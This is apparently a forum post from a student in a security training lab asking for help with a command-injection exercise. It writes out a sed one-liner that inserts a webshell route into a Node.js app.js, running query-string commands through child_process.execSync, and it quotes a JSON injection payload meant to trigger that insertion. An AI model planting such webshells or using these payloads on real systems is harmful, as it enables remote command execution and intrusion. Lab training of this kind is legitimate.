Hello,
I’m looking for help for the Command Execution portion of this module. The task is to write a new API route into the app.js file to create a webshell.
I cannot for the life of me get this working at all locally. Without using the API, I can confirm this command works to rewrite the app.js
sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});' src/app.js
Afterwards I can run a GET request to the endpoint to read files.
Whenever I try to do it in the app, all I get are syntax errors. I’ve tried escaping, modifying the syntax, using other ways, but I can’t get it to work.
This command injection gives me this feedback
{"text":"'}) + require('child_process').execSync('sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});'\" src/app.js')//
}
{"message":"Bad escaped character in JSON at position 62 (line 1 column 63)"}
Sometimes, I can get the API to give me a normal response, but then the file isn’t overwritten at all. Very lost here.